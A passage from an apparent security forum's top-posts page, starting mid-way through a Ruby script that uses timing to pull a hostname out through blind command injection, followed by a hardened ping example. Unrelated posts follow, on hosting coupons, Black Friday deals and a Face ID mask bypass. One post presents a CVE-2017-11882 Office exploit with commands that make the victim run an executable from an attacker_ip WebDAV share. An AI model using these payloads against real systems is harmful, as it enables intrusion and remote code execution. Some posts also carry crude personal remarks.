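        ch = m[3] if ch == m[2]
        ch =~ /\A\d+\z/ ? ch.to_i : 0   # non-numeric: sleep errors out at once
      elsif payload.include?('wc -c')
        out.bytesize
      else
        0
      end
    BASELINE + delay
  end
end

# Live oracle: time the vulnerable script itself (assumed to sit in the
# current directory and to take the injected string as its first argument).
def live_oracle(script = 'server-online.rb')
  lambda do |payload|
    start = Process.clock_gettime(Process::CLOCK_MONOTONIC)
    system('ruby', script, payload, out: File::NULL, err: File::NULL)
    Process.clock_gettime(Process::CLOCK_MONOTONIC) - start
  end
end

if __FILE__ == $0
  oracle = ARGV[0] == 'live' ? live_oracle : simulated_oracle('hacker.local')
  len = extract_length(oracle)
  puts "length: #{len}"
  puts "hostname: #{extract_hostname(oracle, len)}"
end
```

Against the live oracle every guess costs at least one full baseline run, and a hit costs two (the confirmation), so on a real target put the likely characters first in CHARSET and raise TOLERANCE if the network adds jitter.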
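The closing paragraph says mitigations are the developer's job; ping-2.rb shows the kind that does not work. The example below is added here and is not the post's ping.rb or ping-2.rb: it puts the vulnerable pattern beside a hardened one. The hardened version validates the argument against an allow-list (an IP literal or a DNS hostname) and then executes ping through Ruby's multi-argument system, which never involves /bin/sh, so none of the payloads in the post (;, |, $(), brace expansion, ${IFS}) have anything to act on. The regex and the function names are my own, not from the page.

```ruby
#!/usr/bin/env ruby
# Added example, not the original post's ping.rb or ping-2.rb: the vulnerable
# pattern beside a hardened version. Stripping whitespace (ping-2.rb) is not
# a fix, because /bin/sh still interprets the user's input; the fix is to
# validate the input against an allow-list and never hand it to a shell.
require 'ipaddr'

# RFC 1123-style hostname: labels of letters, digits and hyphens, not starting
# or ending with a hyphen, at most 253 characters in total (my own regex).
HOSTNAME_RE = /\A(?=.{1,253}\z)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*\.?\z/i

# Vulnerable (ping-2.rb pattern): the argument lands on a shell command line,
# so ;, |, $() and brace expansion are all honoured even with whitespace gone.
def vulnerable_ping_command(host)
  "ping -c 4 #{host.gsub(/\s+?/, '')}"
end

# Allow-list: an IPv4/IPv6 literal or a DNS hostname, nothing else. Every
# payload from the post fails this check (they contain ;, |, $, {, } or spaces).
def valid_host?(host)
  return false if host.nil? || host.empty? || host.include?('/')
  return true if host =~ HOSTNAME_RE
  IPAddr.new(host)   # raises IPAddr::InvalidAddressError on anything else
  true
rescue ArgumentError # IPAddr::InvalidAddressError is a subclass of ArgumentError
  false
end

# Hardened: build an argv array. Ruby's multi-argument system/spawn execs the
# program directly, so no shell ever sees the host string.
def safe_ping_argv(host)
  raise ArgumentError, "refusing to ping #{host.inspect}" unless valid_host?(host)
  ['ping', '-c', '4', host]
end

def safe_ping(host)
  system(*safe_ping_argv(host))
end

if __FILE__ == $0 && !ARGV.empty?
  begin
    puts(safe_ping(ARGV[0]) ? 'ping ok' : 'ping failed')
  rescue ArgumentError => e
    warn e.message
    exit 1
  end
end
```

The allow-list is the part that matters for command injection; `-c 4` is fixed in the array, so even a validated host cannot add options, and the regex rejects a leading hyphen so the host can never be parsed as a flag.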
  36. 3 points
    This talk was given on 7 July 2017 at Camp++ 0x7e1. MKV downloads and presentation slides are available at https://camp.hsbp.org/2017/pp7e1/fahrplan/events/31.html
  37. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  38. 3 points
    She took you for a fool, and then made an even bigger fool of you. Give her a kick in the backside and divorce her; you'll surely find 100 other "babes" like her to drive around in your Mercedes.
  39. 3 points
    In case you want to make sure the romantic side of your lives is in line with the social one, I recommend:
  40. 3 points
    Offer from Shodan: lifetime upgrade to a premium account for $5 instead of $49. Includes: all add-ons (HTTPS, Telnet, up to 10000 search results), 20 export credits, Shodan maps, images, command-line, and a free copy of the Shodan book.
  41. 3 points
    Black Friday hosting deals (provider, coupon codes, offer, start and end dates):

    A
    A2 Hosting (HUGE67, CMVPS, RSL40): 67% off Shared Hosting / 50% off Managed & Core VPS / 40% off Reseller Hosting. Nov 23 to Nov 27.
    AdroitSSD (link activation): 67% off all hosting plans for the first invoice. Nov 24 to Dec 16.
    AltusHost (link activation): 50% off (first 3 months) Shared & VPS Hosting. Nov 24 to Nov 27.
    B
    BGOcloud
    BigScoots
    Blazing Fast Host (BLACKFRIDAY70, BLACKFRIDAY50, BLACKFRIDAY40): 70% lifetime discount on Shared & Reseller Hosting (annual plan) / 50% off Cloud & VPS Hosting / 40% off Shared & Reseller Hosting (any subscription term). Now to Nov 29.
    BlueHost (link activation): $2.65/mo Basic Shared Hosting (36-mo). Nov 25 to Nov 27.
    BulwarkHost
    BuzzMe Internet (BIG50): 50% off Shared Hosting. Nov 20 to Nov 30.
    C
    Cloudways (BF150): free $150 hosting credits. Nov 22 to Dec 11.
    Codero
    Cloudngin
    Cloudpap Inc
    CuroWeb (CYBER25): 25% off all Managed WordPress Hosting. Nov 27 to Dec 1.
    D
    Dazzling (BF52OFF, BF10OFF): 52% off Shared Hosting & Reseller Hosting / 10% off VPS & Dedicated Servers. Now to Dec 10.
    Dollar1Hosts (DOLLARBFOT40, DOLLARBFRD25, DOLLARBFVD15): 40% off Linux Shared & Reseller Hosting plan / 25% lifetime discount on Golden and Platinum Hosting / 15% lifetime recurring discount on VPS & Dedicated Hosting.
    DTS-Net (WHSR50): 50% off all hosting plans. Now to Nov 31.
    E
    eHost
    eUKhost (HW20DS, BACKUP50): 20% off SSD Dedicated Hosting / 31% off Remote Backups. Now to Nov 30.
    Evolve (DOMAIN30, SHARED40, SSL30): 30% off Domain Registration / 40% off Shared Hosting / 30% off SSL. Now to Nov 30.
    F
    FastComet (BLACK30, SERVER30): 30% off Shared Hosting / 30% off VPS & Dedicated Hosting. Nov 22 to Nov 28.
    Fast Web Host (link activation): 70% off Shared Hosting / 60% off VPS Hosting. Nov 26 to Nov 30.
    Fixus Host (BLACKFRIDAY): 60% off all Shared Hosting (quarterly / yearly subscription). Now to Dec 31.
    FlyWheel
    G
    Gigenet
    GlowHost (BF50ELASTIC, BF30SHARED, BLACKCYBERDEDI): 50% off Elastic Sites Packages / 30% off Shared Packages / 50% off & second month free on Dedicated Hosting. Nov 24 to Nov 24.
    GreenGeeks (link activation): $2.95/mo Shared Hosting (36-mo). Nov 24 to Nov 27.
    GoatCloud
    Go Get Space
    H
    Hawk Host (BFSHARED2017, BFSD2017, BFVPS2017): 70% off Shared Hosting / 70% off Semi Dedicated Hosting / 60% off VPS Hosting. Nov 23 to Nov 26.
    Host 1 Plus (CYBERECLIPSE): 50% off Cloud & VPS Hosting, 1-3 month billing cycles. Nov 20 to Nov 27.
    Host Bazzar (BLACKFRIDAYSHOT, BLACKFRIDAYSSOT, BLACKFRIDAYAHOT): 41% off Linux & SSD Reseller Hosting / 41% off Linux & SSD Shared Hosting / 431% off Linux Application Hosting. Nov 20 to Dec 31.
    HostColor (BFCLOUD): 30% off any Public Clouds. Nov 24 to Nov 25.
    Hostgator (link activation): 65% off + $5.99 domains on all hosting plans / flash sales go up to 80% discount, check the official site for details. Nov 23 to Nov 28.
    Hostinger (link activation): up to 90% off Shared Hosting. Now to Nov 30.
    Hoo.st
    HostPapa
    Host Sailor (BLKFRDLET, BLKFRDLET40, LEBVPN40): 50% lifetime discount on VPS Hosting / 40% lifetime discount on VPS Hosting (semi-yearly) / 40% off VPN (yearly). Nov 25 to Dec 31.
    Host Slayer
    HostVPS (BLACKFRIDAY): 50% off VPS Hosting located in Spain. Nov 24 to Nov 24.
    I
    InMotion Hosting (link activation): $2.95/mo Shared Hosting. From now.
    Insight Hosting (BLACKFRIDAY75, BLACKFRIDAY25): 75% lifetime discount on Shared & Reseller Hosting / 25% lifetime discount on Cloud, VPS & Dedicated Hosting. Now to Nov 27.
    Interserver (link activation): 50% off Shared & VPS Hosting. Nov 24 to Nov 27.
    iPage
    J
    Jolt (BLACKFRIDAY): 75% off all Shared & Reseller Hosting. Nov 24 to Nov 27.
    K
    Kickassd (WHSR50FRIDAY): 50% off all annual hosting plans. Nov 24 to Nov 25.
    L
    LFC Hosting (LFCBLACKFRIDAY): 10% lifetime discount on Weebly Site Builder, Shared Hosting & Unmanaged SSD VPS Hosting. Nov 16 to Dec 31.
    Liquid Web
    LittleBizzy (BLACKFRIDAY): free SFTP + SSL + MailGun on any new Business Hosting (or above) plan. Now to Nov 30.
    M
    M3 Server
    Media Temple
    MightWeb (BF2017WEB, BF2017VPS, BF2017RESELLER): 50% off Shared Hosting / 40% off VPS Hosting / 30% off Reseller Hosting. Nov 21 to Nov 30.
    MilesWeb (BF2017): 75% off Shared Hosting, VPS and Reseller Hosting. Now to Nov 25.
    N
    NameCheap (link activation): up to 99% off Domain Names. From Nov 24.
    Nethosting
    Netmoly
    O
    One.com (link activation): $0.25/mo shared hosting. From now.
    OrangeWebsite
    P
    Philmorehost (20OFFALL): 20% off Shared, VPS & Dedicated Hosting. Now to Dec 31.
    Pressable (GREENFRIDAY): 25% off the 5, 10 and 20 Sites plans. Now to Nov 27.
    PreWebHost (PREWEB2017OT, PREWEB2017LT, PREWEBBFVDR): 60% off Linux Shared & Reseller Hosting / 40% lifetime discount on Linux Shared and Reseller Hosting / 30% lifetime discount on annual VPS & Dedicated Hosting. Now to Dec 10.
    PreWebHost India (BFDEALINDIA): 50% lifetime discount on Linux Reseller & Shared Hosting. Now to Dec 10.
    R
    RainHost: 3 months free usage of all paid features. Nov 25 to Nov 28.
    ResellerClub (BLACKFRIDAY): 55% off Shared Hosting, Cloud Hosting and Reseller Hosting plans. Now to Nov 27.
    Rose Hosting (RHBF17): 50% off Managed Linux VPS Hosting for the first 6 months. Now to Dec 1.
    S
    ServerPilot (link activation)
    Server Point (link activation): 35% off + free domain & Weebly site builder. Now to Dec 31.
    SLU Hosting (BF2OFF): 2 months free with 1 year Bronze Shared Hosting. Nov 23 to Nov 30.
    SiteGround (link activation): 70% off all Shared Hosting. Nov 24 to Nov 28.
    Spiral Hosting
    Squirrel Hosting
    SSD Cloud (BLACKFRIDAY40, BLACKFRIDAY75, BLACKFRIDAY90): 40% off first month on VPS & Dedicated Hosting / 75% lifetime discount on Shared & Reseller Hosting / 90% off all Shared & Reseller Hosting. Now to Nov 29.
    StackPress (SAVE70): 70% off WordPress Hosting plans for six months. Nov 24 to Nov 28.
    T
    Temok (BLACKFRIDAY2017): 40% off + free domain on all hosting plans. Nov 10 to Dec 8.
    TMD Hosting (link activation): up to 78% off shared and VPS hosting plans; managed SSD hosting starts at $1.99/mo. From now.
    TrueHost Cloud
    Turnkey Internet (link activation): up to 95% off Dedicated Servers / 75% off VPS Cloud Servers / 90% off Shared Hosting. From Nov 13.
    U
    UK2.net (link activation): 40% off WordPress Hosting / free 12 months Shared Hosting. Nov 20 to Nov 30.
    Umbrella Host (WHSRBLACKFRIDAY): 50% off Linux Hosting, 6 months. Now to Nov 27.
    Unlimited Web Hosting UK (HOSTINGBF2017, DOMAINSBF2017, SSLBF2017): 20% off first month on all hosting products / 20% off first year on a new Domain Name / 20% off first year on a new SSL Certificate. Now to Nov 27.
    USH Internet (BIG70BLACKFRIDAY): 70% off all Shared Hosting. Now to Nov 30.
    V
    Volarus Hosting
    W
    Web Host Face (FACESPECIAL): 90% off all Shared Hosting. From now.
    Web Hosting Pad (link activation): upgrade hosting plans at the introductory rates. Nov 20 to Dec 31.
    Web Host Pro (WHSRBF17): 50% off Shared & Reseller Hosting (annual subscription). Now to Nov 30.
    Web Hosting Pros
    Web Host UK (BLACKFRIDAY50, BLACKFRIDAY): 50% off Shared & Reseller Hosting / 20% off VPS & Dedicated Hosting. Now to Dec 31.
    Web Hosting UK (BF50OFF, SECURE25): 50% off cPanel and Windows Hosting / £49.99 Dedicated Hosting. Now to Nov 30.
    WebHostingBuzz
    Web Hosting Hub (link activation): $1.95/mo hosting for the first 3 months. From now.
    WireNine (BF2017): 70% off all web hosting plans. Nov 24 to Nov 27.
    WP Engine (CYBERWPE35): 35% off first month on all WP Engine Hosting. Nov 22 to Nov 30.
  42. 3 points
    I'll buy the site from you if you also give me the profile of the girl in the screenshot.
  43. 3 points
    Microsoft Office - OLE Remote Code Execution Exploit CVE-2017-11882

    Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/
    MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
    Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
    Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

    DEMO PoC exploitation: webdav_exec CVE-2017-11882

    A simple PoC for CVE-2017-11882. This exploit triggers the WebClient service to start and executes a remote file from an attacker-controlled WebDAV server. The reason this approach can be handy is the limit on the length of the executed command; with the help of WebDAV it is nevertheless possible to launch an arbitrary attacker-controlled executable on the vulnerable machine.

    This script creates a simple document with several OLE objects. These objects exploit CVE-2017-11882, which results in sequential command execution. The first command, which triggers the WebClient service start, may look like this:

        cmd.exe /c start \\attacker_ip\ff

    The attacker-controlled binary path should be a UNC network path:

        \\attacker_ip\ff\1.exe

    Usage:

        webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name

    Sample exploit for CVE-2017-11882 (starting calc.exe as payload): the example folder holds an .rtf file which exploits the CVE-2017-11882 vulnerability and runs the calculator on the system.

    Download: CVE-2017-11882-master.zip or git clone https://github.com/embedi/CVE-2017-11882.git
    Mirror: webdav_exec_CVE-2017-11882.py
    Source
  44. 3 points
    You have an "anti-cancer" medicine and you need promotion? If it were any good, wouldn't it promote itself? Get out of here if you're trying to get rich off people who suffer from something like that by selling them lies.
  45. 3 points
    If you mean the deal between Erdeesh and Ericsson, it's only preparation (which takes a few years) to support 5G, not the implementation itself. Even if it's promising, 5G is currently still at the research stage. From there to the business and consumer roll-out stage is a whole different story. I recently spoke with an academic who works in the field; their teams received funding of many millions of ££ from the UK Government and giant companies (among them Ericsson) for research, and he said there is a very strong emphasis on security. A consulting and security firm with a few smart guys (and girls) who know their stuff could milk a few million in the near future.
  46. 3 points
    Well, wait. If with a million likes you have an impact of roughly 300-1000 likes per post, from what I've seen, that's very little. I mean, if you have a girl's account with 2000 fans and you post a tit, you'll surely get 1500 likes, compared to yours with 900 and over a million likes. Just saying. As the guys said, maybe you can sell the page's like count itself, because otherwise it's nowhere near worth that much with that post reach. Think about it: if someone has a product, 150 hundred bucks gets far more conversions than buying your page would, even in the long run. Good luck with the sale!
  47. 3 points
    Maybe you'll get enough for a pastry out of it too.

    Samsung Galaxy S7 mobile phone, 32GB, 4G, Black, 1,000 units at 1,499.99 lei https://www.emag.ro/...m/pd/DJXR03BBM/
    Arctic AK54270+ fridge-freezer, 262 l, H 170.5 cm, Class A+, 500 units at 599.99 lei https://www.emag.ro/...0/pd/DQFG82BBM/
    Ariel Pods 3 in 1 detergent capsules, 3 x 39 washes, 4,000 units at 89.99 lei https://www.emag.ro/...3/pd/DVBYB0BBM/
    Microsoft Xbox One Slim 500 GB console, 500 units at 599.99 lei https://www.emag.ro/...0/pd/D01LQ7BBM/
    A+ power bank, 10,000 mAh, 5,000 units at 39.99 lei https://www.emag.ro/...w/pd/DF3W42BBM/
    Nei LED TV, 81 cm, HD, 1,000 units at 399.99 lei https://www.emag.ro/...0/pd/DTFY6NBBM/
    Tefal Only Cook wok pan, 28 cm, thermo-spot, 3,000 units at 49.99 lei https://www.emag.ro/...5/pd/DVWK9NBBM/
    Lenovo IdeaPad laptop, Intel Celeron N3060 processor at 2.48 GHz, 15.6" screen, 2GB memory, 500 GB hard disk, Intel HD Graphics 400, Black, 500 units at 499.99 lei https://www.emag.ro/...i/pd/DC6DSNBBM/
    Philips-AVENT SCF870/22 steam cooker and blender, 1,200 units at 349.99 lei https://www.emag.ro/...2/pd/E1TNKBBBM/
    Orium 601 185/65 R15 88T winter tyre, 1,000 units at 99.99 lei https://www.emag.ro/...1/pd/D9TB92BBM/
    Selgros http://www.selgros.ro/catalog/black-friday-nr-46?id=115#book/page/1
    Flanco https://drive.google.com/open?id=154xgZNJEXFoWh2HMdVm7mVRf-3oSxHxM

    >collected from the net. >getagolf.com >donations >bf >screw profitshare.
  48. 3 points
    Are you sure you entered the prices correctly and don't have a keyboard problem? The "k" keeps getting pressed after every digit....
  49. 3 points
    I'd like to take his... his Face ID... off

    Apple's facial-recognition login system in its rather expensive iPhone X can be, it is claimed, fooled by a 3D printed mask, a couple of photos, and a blob of silicone.

    Bkav Corporation, a tech security biz with offices in the US and Singapore, specializes in bypassing facial-recognition systems, and set out to do the same with Face ID when it got hold of a $999 iPhone X earlier this month. The team took less than a week to apparently crack Cupertino's vaunted new security mechanism, demonstrating that miscreants can potentially unlock a phone with a mask of the owner's face.

    "Everything went much more easily than you expect. You can try it out with your own iPhone X, the phone shall recognize you even when you cover a half of your face," the biz said in an advisory last updated on Saturday. "It means the recognition mechanism is not as strict as you think, Apple seems to rely too much on Face ID's AI. We just need a half face to create the mask. It was even simpler than we ourselves had thought."

    After registering a person's face on the phone (the handset should then only unlock when it sees this face), the team built a 3D printed mask of the test subject using an off-the-shelf 3D printer. They then put 2D printouts of the user's eyes, upper cheekbones and lips over the mask and added a silicone nose for realism.

    The creation wasn't able to defeat Face ID at first, as other folks with the same idea have found. But by sculpting and shading the false nose on one side to imitate shadow, plus a few other tweaks, the team managed to use the mask to fool the iPhone X into unlocking, it is claimed.

    The hack was cheap: Bkav estimates the total cost in materials for a face to hoodwink Face ID was around $150. It acknowledged that the hack isn't for everyone to try out. It requires in-depth knowledge of how Apple's face-scanning software works and what the weak points in the system are.

    "With Face ID's being beaten by our mask, FBI, CIA, country leaders, leaders of major corporations, etc are the ones that need to know about the issue, because their devices are worth illegal unlock attempts," it said. "Exploitation is difficult for normal users, but simple for professional ones."

    The team is still researching how to crack the system more easily and refining their methods. In the meantime the biz advises sticking to fingerprints for biometric security. ®

    Via theregister.co.uk
  50. 3 points
    Events so far: When adult males take Dianabol, just as with every other anabolic steroid, the body's natural production of testosterone becomes suppressed. When this happens and testosterone levels stay suppressed for an extended length of time, there are several consequences. There is an additional side effect when the natural production of testosterone is suppressed, and that is, since it's made in the testicles, when production is severely slowed down the testicles will naturally atrophy due to lack of activity. I recommend you get a testosterone test, only 41 lei at Synevo. Don't forget to post the result on the forum too, I'm dying of curiosity.